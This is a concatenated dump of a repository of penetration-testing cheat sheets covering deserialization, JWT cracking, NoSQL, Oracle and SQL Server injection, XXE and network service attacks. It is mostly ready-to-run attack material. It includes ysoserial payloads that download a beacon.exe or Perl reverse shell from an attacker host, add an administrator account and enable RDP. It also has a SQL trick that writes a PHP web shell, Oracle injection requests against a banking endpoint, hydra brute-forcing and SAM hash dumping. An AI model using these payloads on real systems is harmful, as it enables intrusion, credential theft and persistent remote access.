├── Insecure deserialization.md ├── JSON Web Token Attack.md ├── NoSQL Injection.md ├── OS_Command.md ├── Oracle SQL Injection Syntax.md ├── Penetration Testing.md ├── SQL Server Union-Based SQL Injection.md ├── Speical Grepping.md └── XXE.md /Insecure deserialization.md: -------------------------------------------------------------------------------- 1 | # Insecure deserialization Vulnerability 2 | Any Insecure deserialization vulnerability may occur when serialized object are allowed to alter.subconsequently,deserialization vulnerabilities could allow attackers to perform remote code execution without authentication in the context of application server and gaining access to unauthorized data.Serialized objects are generally sent across is base64 format used in web applications.Technically Serialization is the process of converting the object and class into a binary so that save into disk. on the other hand,deserialization is the process of converting the Object(Bring Back to original Object at the code stage).. 3 | 4 | # SOAP NET Deserialization 5 | ``` 6 | ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c ipconfig" -o raw 7 | ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c hostname" -o raw 8 | ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c certutil.exe -urlcache -split -f http://192.168.100.199\beacon.exe C:\\Users\\Public\\beacon.txe" -o raw 9 | ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f" 10 | 11 | ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 12 | " 13 | ``` 14 | # Java Deserialization 15 | 16 | The deserialization vulnerabilities may occur when deserialize convert to an object any serialized stream without first validating in the Java Base Application. 17 | due to the combination of two rudimentary implementations flaws.The deserialization vulnerabilities are considered difficult to make it secure in the application for develops. 18 | ``` 19 | 20 | java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget sdfsfdoztjxibkocen698fskck0ehs8yymn.burpcollaborator.net" 21 | java -jar ysoserial-0.0.5-all.jar CommonsCollections1 'wget http://192.168.100.199:1010/reverse-shell.pl -O /tmp/shell.pl' > perl-reverse-shell.pl.bin 22 | java -jar ysoserial-0.0.5-all.jar CommonsCollections1 'cat /etc/passwd' > passwd.bin 23 | ``` 24 | # ViewState Deserialization 25 | 26 | view state is the technique used by an ASP.NET Web page to persist changes to the state of a Web Form across postbacks. By default. 27 | technically ViewState is used to store user data on page at the time of post back of web page however ViewState does not hold the controls,it holds the values of controls. 28 | When tthe page is accessed, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields. 29 | 30 | **It might be possible to execute arbitrary OS Command In the context of applicaiton server if MAC doesn't enforce to enable in the viewstate parameter.** 31 | 32 | This format seems to be standardized for all Viewstate implementations in the ASP.Net Application. 33 | 34 | * Base64 **Can be defined using EnableViewStateMac and ViewStateEncryptionMode attribute set to false** 35 | * Base64 + MAC (Message Authentication Code) **Enabled Can be defined using EnableViewStateMac attribute set to true** 36 | * Base64 + Encrypted **Can be defined using viewStateEncryptionMode attribute set to true** 37 | ``` 38 | ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c certutil.exe -urlcache -split -f http://192.168.100.199\beacon.exe C:\\Users\\Public\\beacon.exe" 39 | ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f" 40 | 41 | ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes" 42 | ``` 43 | # Json Deserialization 44 | ``` 45 | ysoserial.exe -g WindowsIdentity -f Json.Net -c "ping 192.168.100.100" -o base64 46 | ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c net user MeMe 123456!@ /add " -o base64 47 | ysoserial.exe -g WindowsIdentity -f Json.Net -c "net localgroup administrators MeMe /add" -o base64 48 | ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes" -o base64 49 | ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f" -o base64 50 | 51 | ``` 52 | 53 | 54 | * Credit@https://book.hacktricks.xyz/pentesting-web/deserialization 55 | * Credit@https://speakerdeck.com/pwntester/attacking-net-serialization?slide=5 56 | * Credit@https://0xdf.gitlab.io/2020/02/15/htb-json.html 57 | * Credit@https://notsosecure.com/remote-code-execution-via-php-unserialize/?utm_campaign=calap.co&utm_medium=referral&utm_source=calap.co 58 | * Credit@https://0xrick.github.io/hack-the-box/arkham/ 59 | -------------------------------------------------------------------------------- /JSON Web Token Attack.md: -------------------------------------------------------------------------------- 1 | 2 | ### JSON Web Authentication 3 | 4 | 5 | JSON Web Tokens used by most modern web applications to claims between two Endpoint to protect the integrity of the underlying message using a Message Authentication Code (MAC) encrypted. 6 | 7 | 8 | * The Header contains metadata, defines the type of token and the algorithm used for encryption of Payload. 9 | * The Payload contains the claims to routes and services in value key pairs. 10 | * The signature is calculated by encrypting the base64UrlEncoded values of Header and Payload using a secret Key 11 | 12 | ### HMAC Secret Key Brute-forcing 13 | 14 | The algorithm HS256 uses a secret key to sign and verify each message. The algorithm RS256 uses a private key to sign messages, and a public key to verify them and uses the public key for authentication. 15 | 16 | ``` 17 | python3 jwtcat.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4 -w /usr/share/wordlists/rockyou.txt 18 | 19 | python3 jwtcat.py -t -w /usr/share/wordlists/rockyou.txt 20 | 21 | python3 jwtcat.py -w /usr/share/wordlists/rockyou.txt 22 | 23 | ``` 24 | 25 | ### JSON Public Keys 26 | The algorithm HS256 uses a secret key to sign and verify each message. The algorithm RS256 uses a private key to sign messages, 27 | **To obtain the Public Key using openssl client** 28 | ``` 29 | TARGET_HOST="" 30 | TARGET_PORT="443" 31 | openssl s_client -showcerts -connect $TARGET_HOST:$TARGET_PORT /dev/null|openssl x509 -outform PEM > $TARGET_HOST.pem 32 | openssl x509 -in cert.pem -pubkey –noout > key.pem 33 | cat resilient.pem | xxd -p | tr -d "\\n" # Turning into ASCII hex Format 34 | 35 | ``` 36 | To obtain The HMAC signature, which is being used by targeted application. 37 | ``` 38 | echo -n "" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e2043455254494649434154452d2d2d2d2d0a4d49494a566a43434344366741774942416749514171475a77597151525a7743414141414148504d6244414e42676b71686b69473977304241517346414442430a4d517377435159445651514745774a56557a45654d4277474131554543684d56523239765a32786c4946527964584e3049464e6c636e5a705932567a4d524d770a45515944565151444577704856464d67513045674d5538784d423458445449774d4463784e5441344d6a6b784e6c6f58445449774d5441774e7a41344d6a6b780a4e6c6f775a6a454c4d416b474131554542684d4356564d78457a415242674e5642416754436b4e6862476c6d62334a7561574578466a415542674e56424163540a445531766457353059576c7549465a705a586378457a415242674e5642416f54436b6476623264735a53424d54454d784654415442674e5642414d4d44436f750a5a3239765a32786c4c6d4e766254425a4d424d4742797147534d34394167454743437147534d34394177454841304941424f4b424d4b2b7949617a41446b32490a7939345a6e39496c437536526566637572715466556559777a7569486e76452f394550517257694e47462b586777424b6b3352535775484b6f694f2f643543710a732f745668382b6a676762744d4949473654414f42674e56485138424166384542414d4342344177457759445652306c42417777436759494b775942425155480a4177457744415944565230544151482f424149774144416442674e56485134454667515552652f416743325164474838374358586953382f69323158447577770a487759445652306a42426777466f41556d4e4834626844727a357673594a38596b4275673633304a2f537377614159494b7759424251554841514545584442610a4d4373474343734741515546427a41426868396f644852774f69387662324e7a6343357761326b755a3239765a79396e64484d78627a466a62334a6c4d4373470a4343734741515546427a41436868396f644852774f693876634774704c6d6476623263765a334e794d69394856464d78547a457559334a304d494945714159440a56523052424949456e7a4343424a754344436f755a3239765a32786c4c6d4e766259494e4b693568626d527962326c6b4c6d4e76625949574b6935686348426c0a626d6470626d55755a3239765a32786c4c6d4e766259494a4b6935695a4734755a475632676849714c6d4e736233566b4c6d6476623264735a53356a623232430a47436f7559334a766432527a62335679593255755a3239765a32786c4c6d4e76625949474b69356e4c6d4e76676734714c6d646a6343356e646e51794c6d4e760a625949524b69356e5933426a5a4734755a335a304d53356a6232324343696f755a326477614851755932364344696f755a32746c593235686348427a4c6d4e750a676859714c6d6476623264735a533168626d46736558527059334d7559323974676773714c6d6476623264735a53356a5959494c4b69356e6232396e624755750a5932794344696f755a3239765a32786c4c6d4e764c6d6c75676734714c6d6476623264735a53356a627935716349494f4b69356e6232396e62475575593238750a6457754344796f755a3239765a32786c4c6d4e7662533568636f49504b69356e6232396e62475575593239744c6d4631676738714c6d6476623264735a53356a0a62323075596e4b4344796f755a3239765a32786c4c6d4e766253356a623449504b69356e6232396e62475575593239744c6d3134676738714c6d6476623264730a5a53356a6232307564484b4344796f755a3239765a32786c4c6d4e7662533532626f494c4b69356e6232396e624755755a47574343796f755a3239765a32786c0a4c6d567a676773714c6d6476623264735a53356d636f494c4b69356e6232396e624755756148574343796f755a3239765a32786c4c6d6c30676773714c6d64760a623264735a5335756249494c4b69356e6232396e624755756347794343796f755a3239765a32786c4c6e4230676849714c6d6476623264735a57466b595842700a6379356a6232324344796f755a3239765a32786c595842706379356a626f49524b69356e6232396e6247566a626d467763484d755932364346436f755a3239760a5a32786c59323974625756795932557559323974676845714c6d6476623264735a585a705a4756764c6d4e766259494d4b69356e6333526864476c6a4c6d4e750a676730714c6d647a6447463061574d7559323974676849714c6d647a6447463061574e6a626d467763484d755932364343696f755a335a304d53356a623232430a43696f755a335a304d69356a6232324346436f7562575630636d6c6a4c6d647a6447463061574d7559323974676777714c6e5679593268706269356a623232430a45436f7564584a734c6d6476623264735a53356a6232324345796f75643256686369356e6132566a626d467763484d755932364346696f7565573931644856690a5a53317562324e76623274705a53356a6232324344536f7565573931644856695a53356a6232324346696f7565573931644856695a57566b64574e6864476c760a6269356a6232324345536f7565573931644856695a5774705a484d7559323974676763714c6e6c304c6d4a6c676773714c6e6c306157316e4c6d4e76625949610a5957356b636d39705a43356a62476c6c626e527a4c6d6476623264735a53356a62323243433246755a484a7661575175593239746768746b5a585a6c624739770a5a5849755957356b636d39705a43356e6232396e62475575593236434847526c646d56736233426c636e4d755957356b636d39705a43356e6232396e624755750a593236434247637559322b434347646e634768304c6d4e756767786e6132566a626d467763484d7559323643426d64766279356e624949555a3239765a32786c0a4c5746755957783564476c6a6379356a62323243436d6476623264735a53356a6232324344326476623264735a574e75595842776379356a626f49535a3239760a5a32786c593239746257567959325575593239746768687a62335679593255755957356b636d39705a43356e6232396e6247557559323643436e5679593268700a6269356a62323243436e64336479356e623238755a32794343486c76645852314c6d4a6c676774356233563064574a6c4c6d4e766259495565573931644856690a5a57566b64574e6864476c766269356a6232324344336c7664585231596d56726157527a4c6d4e766259494665585175596d5577495159445652306742426f770a4744414942675a6e67517742416749774441594b4b7759424241485765514946417a417a42674e56485238454c4441714d4369674a71416b68694a6f644852770a4f69387659334a734c6e42726153356e6232396e4c306455557a46504d574e76636d557559334a734d4949424241594b4b7759424241485765514945416753420a39515342386744774148634135784c797344642b476d4c376a736b4d59595478366e73337931596445535a62382b447a532f4a42564734414141467a556336680a5177414142414d4153444247416945416c735575324e7072545475722f4b5839306664594e2f3352702b5575755a496135554a38777a715255626f43495144670a4b32674c396a2f5863374b417766454d4e64346c764775676c4350344258675a74413658434b6e6230674231414165335842766c66576a2f3862444748534d560a7837726d563378586c4c6471377278684f68707030364963414141426331484f6f7a674141415144414559775241496751535348324f3761484e5753335056510a2f5231726b6b414832523336487844464964496b736f566543506f4349464b48596371786f6a6d7556746e2f68424a5a2b4271414f632f586a6775305961754b0a5357555a517864444d41304743537147534962334451454243775541413449424151444c4d68766b4d495349304f2b786d6a44426b636f62707a774d725135740a746634432f3136526e4b64556a3542717a727443426938464b466170664254756d4d477066615a416472687a726974534b75747555414462704f413846586c450a7a5947736b4b6866544d446c314d38356343566b454b51497962346962324e384e6b586d78726363596535524154674d69337a4d5747544e31584135685270700a65356f66522f32652b72665942793937342f6870765a684a704b6a6950584a79726930702f68306d3549674e4a664a53596657617339354f674b4b52585949570a3758396b713778752b706d6b7262474d5674463465586742724c37324e455163306668304c356d415578496e61716a676f614142664e696a533356374d506c670a4d503643756233324b47613575594755427642346c384238387a46485473415542766d6772384c67465451476750503667584b6a327953620a2d2d2d2d2d454e442043455254494649434154452d2d2d2d2d0a 39 | ``` 40 | **Upon Obtaining HMAC Signature, The Final Step is to convert to JWT Format ** 41 | ``` 42 | python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('')).replace('=','')\")" 43 | ``` 44 | 45 | * Credit@https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens 46 | 47 | * Credit@https://pentesterlab.com/exercises/jwt_iii/course 48 | 49 | * Credit@https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6 50 | -------------------------------------------------------------------------------- /NoSQL Injection.md: -------------------------------------------------------------------------------- 1 | # NoSQL Injection methodology 2 | 3 | # NoSQL Operators 4 | 5 | ``` 6 | $ne — not equal 7 | $gt — greater than 8 | $regex — regular expression 9 | $where — clause lets you specify a script to filter results 10 | ``` 11 | 12 | 13 | 14 | # NoSQL Union Query Injection 15 | 16 | Let try to provoke an error by submitting a string accompanied by the single quote (') character, we will come across the following 17 | ``` 18 | https://demo-campass.obih.sg/name=TestUser1' 19 | https://demo-campass.obih.sg/name=TestUser3 20 | https://demo-campass.obih.sg/name=Testuser3', 'address': 'WestJurong 21 | https://demo-campass.obih.sg/name=TestUser3',name:{$ne:'A'},address:'WestJurong 22 | ``` 23 | 24 | 25 | 26 | 27 | 28 | # Blind NoSQL Injection 29 | Suppose that the database returned no results in the browser, regardless of us submitting an included Star Wars character or not. So, we are talking about a “blind” 30 | ``` 31 | https://demo-campass.obih.sg/?name=A',$where: 'function(){sleep(20000);}'} 32 | https://demo-campass.obih.sg/?name=A,$where: 'function(){sleep(20000);}'} 33 | ``` 34 | -------------------------------------------------------------------------------- /OS_Command.md: -------------------------------------------------------------------------------- 1 | #### OS Command 2 | 3 | ``` 4 | create table MeMe(stuff text); 5 | insert into MeMe values(''); 6 | select * from MeMe into dumpfile 'var\\www\\html1\\cmd.php'; 7 | ``` 8 | -------------------------------------------------------------------------------- /Oracle SQL Injection Syntax.md: -------------------------------------------------------------------------------- 1 | ### Real world example of Oracle SQL Injection 2 | 3 | 4 | # Basic Oracle Blind SQL Injection Payloads 5 | ``` 6 | 1' and if(1=1, sleep(20), true)# 7 | 1' or if(1=1, sleep(20), true)# 8 | 1' and if(1=1, sleep(20), false)# 9 | 1' or if(1=1, sleep(20), true)# 10 | 1' and if(1=1, sleep(20), true) -- - 11 | 1' or if(1=1, sleep(20), true) -- - 12 | 1' and if(1=1, sleep(20), false) -- - 13 | 1' or if(1=1, sleep(20), true) -- - 14 | ``` 15 | # Real world example of Oracle SQL Injection 16 | This application security assessment was conducted by me 3 year ago.I released My Noted of Oracle Base SQL injection due to having been scarce to make reference to Oracle Base SQL Injectin while conducting Oracle Base SQL Injection. 17 | ``` 18 | POST /B001/process.jsp HTTP/1.1 19 | Host: 122.248.119.25 20 | User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select user from dual))--+) Gecko/20100101 21 | Firefox/36.0 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 23 | Accept-Language: en-US,en;q=0.5 24 | Accept-Encoding: gzip, deflate 25 | Referer: https://122.248.119.25/B001/banking?fldsegment=EN1 26 | ``` 27 | 28 | ``` 29 | POST /B001/process.jsp HTTP/1.1 30 | Host: 122.248.119.25 31 | User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select banner from v$version where rownum=1))--) Gecko/20100101 32 | Firefox/36.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Referer: https://122.248.119.25/B001/banking?fldsegment=EN1 37 | ``` 38 | ``` 39 | 40 | POST /B001/process.jsp HTTP/1.1 41 | Host: 122.248.119.25 42 | User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select username FROM user_role_privs WHERE granted_role='DBA';))--) Gecko/20100101 43 | Firefox/36.0 44 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 45 | Accept-Language: en-US,en;q=0.5 46 | Accept-Encoding: gzip, deflate 47 | Referer: https://122.248.119.25/B001/banking?fldsegment=EN1 48 | 49 | ``` 50 | ``` 51 | 52 | POST /B001/process.jsp HTTP/1.1 53 | Host: 122.248.119.25 54 | User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select owner, table_name FROM all_tables;))--) Gecko/20100101 55 | Firefox/36.0 56 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 57 | Accept-Language: en-US,en;q=0.5 58 | Accept-Encoding: gzip, deflate 59 | Referer: https://122.248.119.25/B001/banking?fldsegment=EN1 60 | ``` 61 | 62 | 63 | ``` 64 | https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )-- 65 | https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT global_name FROM global_name;) )-- 66 | https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT * FROM session_privs;(Retrieves Current Privs)) )-- 67 | https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT global_name FROM global_name;) )-- 68 | ``` 69 | -------------------------------------------------------------------------------- /Penetration Testing.md: -------------------------------------------------------------------------------- 1 | 2 | ### useful curl 3 | 4 | ``` 5 | curl -s -I http://example.org | grep '^HTTP' 6 | curl -s -I https://example.org | grep '^HTTP' 7 | curl -s -I https://example.org | grep '^Strict' 8 | curl --sslv3 https://example.org 9 | curl --tlsv1.0 -I https://example.org 10 | curl --tlsv1.1 -I https://example.org 11 | curl --tlsv1.2 -s -I https://example.org | grep 'HTTP' 12 | curl -s -I https://example.org | grep '^X-Frame-Options' 13 | curl -s -I https://example_2.org | grep '^X-Frame-Options' 14 | curl -s -I https://example.org | grep '^X-Content' 15 | curl -s -I example.com/url_that_sets_cookie | grep '^Set-Cookie' 16 | nmap -p 443,80 --script http-security-headers 17 | curl -I -L --url 18 | curl -L http://www.google.com (HTTP Location Headers with -L option) 19 | curl -I 20 | curl -x http://10.10.10.10:8080 -L http://sample.com (Local Proxy) 21 | curl -v https://google.com (Testing a connection to a remote site) 22 | curl -I -H 'Accept-Encoding: gzip,deflate' http://example.com/index.php (Checking Header) 23 | curl -v -X OPTIONS http://192.168.56.103 (Check OPTIONS) 24 | curl -X PUT -d ' ~/labnet-ip-list.txt 34 | nmap -p80 --script dns-brute strategicsec.com 35 | nmap --script http-robtex-reverse-ip secore.info 36 | nmap -Pn -p80 --script=http-headers strategicsec.com 37 | nmap -sS -sU -PN -p 1-65535 192.168.0.164(TCP SYN and UDP) 38 | nmap --script http-methods 39 | nmap -p 80 --script dns-brute.nse 40 | nmap --script http-enum 41 | nmap -Pn -p80 --script=http-headers x.x.x.x 42 | ``` 43 | 44 | ### Oracle Attack Methodology 45 | 46 | ``` 47 | oscanner -s 192.168.1.200 -P 1521 48 | nmap --script=oracle-tns-version 49 | nmap -p 1521 -A TARGET 50 | nmap --script=oracle-brute 51 | auxiliary/scanner/oracle/tnslsnr_version ( Oracle - Version) 52 | auxiliary/scanner/oracle/tnspoison_checker 53 | auxiliary/scanner/oracle/sid_enum 54 | auxiliary/admin/oracle/sid_brute 55 | auxiliary/scanner/http/oracle_ilom_login 56 | ``` 57 | 58 | ### SMB service Exploit 59 | 60 | ``` 61 | auxiliary/scanner/smb/smb_login 62 | use auxiliary/scanner/smb/smb_enumusers 63 | exploit/windows/smb/psexec 64 | ``` 65 | ### null sessions 66 | ``` 67 | nmap –script smb-enum-users.nse –p 445 68 | rpcclient –U “” [target IP address] 69 | querydominfo 70 | enumdomusers 71 | queryuser [username] # queryuser msfadmin 72 | enum4linux 192.168.200.129 73 | smbclient //192.168.0.14/tmp 74 | ``` 75 | ### SNMP Service Exploit 76 | 77 | ``` 78 | auxiliary/scanner/snmp/snmp_login 79 | auxiliary/scanner/snmp/snmp_enumusers 80 | auxiliary/scanner/snmp/snmp_enumshares 81 | auxiliary/scanner/snmp/snmp_enum 82 | 83 | hydra -P pass.txt snmp 84 | nmap -sU -v --script snmp-brute --script-args passdb=passwords.lst 85 | nmap -sU -v --script snmp-brute --script-args userdb=usernames.lst,passdb=passwords.lst 86 | 87 | 88 | ``` 89 | 90 | ### MSSQL 91 | 92 | ``` 93 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 94 | auxiliary/admin/mssql/mssql_enum 95 | auxiliary/scanner/oracle/tnspoison_checker 96 | auxiliary/scanner/mssql/mssql_ping 97 | exploit/windows/mssql/mssql_payload 98 | 99 | ``` 100 | 101 | 102 | 103 | ### VPN Accessment 104 | ``` 105 | Ipsec Enumeration 106 | ike-scan --showbackoff 10.0.0.3 10.0.0.6 107 | 108 | ike-scan -M 172.16.21.200 109 | ``` 110 | 111 | ### Enumeration & Attacking Network Services 112 | 113 | ``` 114 | SNMP Enumeration 115 | snmpcheck -t 192.168.1.X -c public 116 | snmpwalk -c public -v1 192.168.1.X 1 117 | snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f 118 | snmpenum -t 192.168.1.X 119 | 120 | nmblookup -A 1.1.1.1 121 | smbclient //MOUNT/share -I target -N 122 | rpcclient -U "" 1.1.1.1 123 | enum4linux target 124 | nbtscan 192.168.1.0/24 125 | enum4linux -a target-ip 126 | Fingerprint SMB Version(smbclient -L //192.168.1.100) 127 | ``` 128 | 129 | ### Useful Metasploit Scan 130 | ``` 131 | scanner/ftp/ftp_version 132 | scanner/ssh/ssh_version 133 | scanner/mssql/mssql_ping 134 | scanner/smb/smb_version 135 | auxiliary/scanner/misc/oki_scanner 136 | auxiliary/scanner/snmp/aix_version 137 | auxiliary/scanner/snmp/cisco_config_tftp 138 | auxiliary/scanner/snmp/cisco_upload_file 139 | auxiliary/scanner/snmp/snmp_enum 140 | auxiliary/scanner/snmp/snmp_enumshares 141 | auxiliary/scanner/snmp/snmp_enumusers 142 | auxiliary/scanner/snmp/snmp_login 143 | auxiliary/scanner/snmp/snmp_set 144 | auxiliary/gather/enum_dns 145 | auxiliary/scanner/http/http_version 146 | auxiliary/scanner/http/tomcat_enum 147 | auxiliary/scanner/ssh/ssh_users 148 | auxiliary/scanner/ssh/ssh_login 149 | auxiliary/scanner/http/joomla_plugins 150 | auxiliary/scanner/http/wordpress_scanner 151 | auxiliary/scanner/http/joomla_version 152 | 153 | 154 | 155 | ``` 156 | 157 | ### DNS Recon and MX Record 158 | 159 | ``` 160 | nslookup -query=mx redhat.com 161 | nslookup -type=ns redhat.com 162 | nslookup -type=soa redhat.com 163 | nslookup -type=any google.com 164 | Using Specific DNS server 165 | nslookup redhat.com ns1.redhat.com 166 | nslookup -port 56 redhat.com 167 | nslookup -debug redhat.com 168 | whois domain-name-here.com 169 | Perform DNS IP Lookup (dig a domain-name-here.com @nameserver ) 170 | Perform MX Record Lookup (dig mx domain-name-here.com @nameserver) 171 | Perform Zone Transfer with DIG(dig axfr domain-name-here.com @nameserver) 172 | dig 1.1.1.1 -t any 173 | dig 1.1.1.1 -t mx 174 | dig 1.1.1.1 -t axfr 175 | dig -x 1.1.1.1 176 | 177 | dnsrecon -d 1.1.1.1 178 | dnsenum nintendo.com 179 | host -t ns megacorpone.com 180 | host -t mx megacorpone.com 181 | host idontexist.megacorpone.com 182 | ``` 183 | 184 | ### DNS Zone Transfers 185 | ``` 186 | nslookup -> set type=any -> ls -d blah.com 187 | dig axfr blah.com @ns1.blah.com 188 | host -l megacorpone.com ns1.megacorpone.com 189 | host -l megacorpone.com ns2.megacorpone.com 190 | dnsrecon -d megacorpone.com -t axf 191 | ``` 192 | 193 | ### Wfuzz Web application fuzzer 194 | 195 | ``` 196 | wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ 197 | wfuzz -c -z file,/usr/share/wfuzz/wordlist/vulns/sql_inj.txt --hc 404 http://192.168.1.202/FUZZ 198 | wfuzz.py -c -v -w wordlist/general/common.txt --hc 404 https://portswigger.net/FUZZ 199 | wfuzz -c -v -z file,wordlist/Injections/SQL.txt --hc 404 http://www.example.com/index.php?id=FUZZ 200 | wfuzz -c -z -v --sc 200 -z file,pass.txt -d "username=admin&password=FUZZ" http://example.com/login.php 201 | ``` 202 | ### Blute Force Netwrok Service 203 | 204 | ``` 205 | hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132 206 | hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132 207 | hydra -t 5 -V -f -l root -P common.txt localhost ssh 208 | hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql 209 | 210 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V 211 | 212 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V 213 | 214 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V 215 | 216 | ``` 217 | ### ALL windows password Cracking 218 | 219 | ``` 220 | make you that system file and sam to your Desktop (somewhere) 221 | 222 | Step 1- bkhive system /root/Desktop/sample.txt 223 | Step-2 -samdump2 SAM /root/Destop/sample.txt > /root/hash.txt 224 | 225 | Step-3 Crack password hashes using John the Ripper 226 | john --format=nt2 hash.txt 227 | Step-4 View the hash file To view cracking Password 228 | ``` 229 | 230 | ### Passive Operating System Fingerprinting 231 | 232 | ``` 233 | p0f -i eth0 -p 234 | p0f -i eth1 âvto output.txt 235 | ping x.x.x.x 236 | ``` 237 | 238 | ### VOIP Assessment 239 | 240 | ``` 241 | auxiliary/scanner/sip/options 242 | auxiliary/scanner/sip/vsipinvate 243 | smap 192.168.1.104 (Scanning a single host) 244 | smap 192.168.1.130/24(Scanning a range of IP ) 245 | smap -O 192.168.1.104 ( SMAP to fingerprint the server/client type and version) 246 | sip-scan -i eth0 192.168.1.1-254(Scanning a subnet) 247 | svmap.py 192.168.1.1-254(Scanning an IP range) 248 | svmap.py 192.168.1.1-254 --fp(fingerprinting scanning) 249 | ### http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP 250 | ``` 251 | 252 | 253 | ### 254 | ``` 255 | OS finger Print 256 | 257 | #xprobe2 -v 192.168.0.174 258 | 259 | Specific Source Ports to Bypass Filtering 260 | hping2 -c 3 -s 53 -p 139 -S 192.168.0.1 261 | ``` 262 | 263 | ### SMTP User enumeration 264 | 265 | ``` 266 | smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1 267 | smtp-user-enum -M VRFY -u root -t 10.0.0.1 268 | smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt 269 | smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1 270 | ``` 271 | -------------------------------------------------------------------------------- /SQL Server Union-Based SQL Injection.md: -------------------------------------------------------------------------------- 1 | ### SQL Server Union-Based SQL Injection 2 | ``` 3 | 4 | https://192.168.100.1/profile.aspx?id=2 order by 100-- 5 | https://192.168.100.1/profile.aspx?id=2 order by 50-- 6 | https://192.168.100.1/profile.aspx?id=2 order by 25-- 7 | https://192.168.100.1/profile.aspx?id=2 order by 10-- 8 | https://192.168.100.1/profile.aspx?id=2 order by 5-- 9 | https://192.168.100.1/profile.aspx?id=2 order by 6-- 10 | https://192.168.100.1/profile.aspx?id=2 order by 7-- 11 | https://192.168.100.1/profile.aspx?id=2 order by 8-- 12 | https://192.168.100.1/profile.aspx?id=2 order by 9-- 13 | https://192.168.100.1/profile.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9-- 14 | 15 | https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9-- 16 | https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9-- 17 | https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9-- 18 | https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins-- 19 | 20 | ``` 21 | -------------------------------------------------------------------------------- /Speical Grepping.md: -------------------------------------------------------------------------------- 1 | ``` 2 | cat list.txt 3 | https://github.com/NyaMeeEain 4 | ``` 5 | ``` 6 | 7 | for i in $(cat list.txt); do data=$(curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" -L -I -s -k "{$i}") ; echo "URL: $i" >> output.txt ; echo "$data" >> output.txt ; done 8 | cat output.txt | grep -o '' | sed -e 's/ 3 | 4 | ]> 5 | &NyaMeeEain;mypass 6 | 7 | 8 | 9 | ]> 10 | &NyaMeeEain;mypass 11 | 12 | ``` 13 | 14 | # blind XXE 15 | 16 | * cat /var/www/dtd.xml 17 | * nc -nlvp 775 18 | ``` 19 | 20 | 21 | "> 22 | 23 | 24 | 25 | "> 26 | ``` 27 | --------------------------------------------------------------------------------